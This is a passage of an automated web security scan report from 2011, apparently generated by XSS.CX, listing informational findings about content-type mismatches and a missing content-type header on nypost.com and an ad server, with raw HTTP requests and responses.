if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

dwr.engine._defaultPath = '/nydn/dw
...[SNIP]...

13.20. http://www.nypost.com/Fragment/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics_bar.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nypost.com
Path:   /Fragment/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics_bar.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /Fragment/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics_bar.jsp HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 576
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=285
Date: Tue, 27 Sep 2011 13:21:07 GMT
Connection: close

<ul id="hot_topics_bar" class="hot_topics">
   <li class="first">
               <a name="&lid=hot_topics&lpos=Brad Pitt" href="/t/Brad Pitt">Brad Pitt</a>
           </li>
       <li>
               <a name="&lid=hot_topics&lpos=Mi
...[SNIP]...

13.21. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 42
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=147
Date: Tue, 27 Sep 2011 13:21:07 GMT
Connection: close

Last Updated:Tue., Sep. 27, 2011, 09:17am

13.22. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nypost.com
Path:   /rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; _chartbeat2=rdx0wt5nps41a8fh.1315773978848; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.3.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=3

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 27 Sep 2011 04:50:47 GMT
Content-Type: image/jpeg
Content-Length: 29040
Cache-Control: must-revalidate, max-age=93
Date: Tue, 27 Sep 2011 13:23:30 GMT
Connection: close

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......,.,.."..............................
...[SNIP]...

14. Content type is not specified  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://link.undertone.com
Path:   /st

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /st?ad_type=ad&ad_size=300x250&entity=334534&site_code=44&section_code=20933 HTTP/1.1
Host: link.undertone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/rtb_tier1?t=1317129821523&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nypost.com%2F&refer=http%3A%2F%2Fwww.nypost.com%2Fp%2Fnews%2Flocal%2Fli_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=0

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:23:26 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 27 Sep 2011 13:23:26 GMT
Pragma: no-cache
Content-Length: 4305
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...

Report generated by XSS.CX at Tue Sep 27 09:04:17 CDT 2011.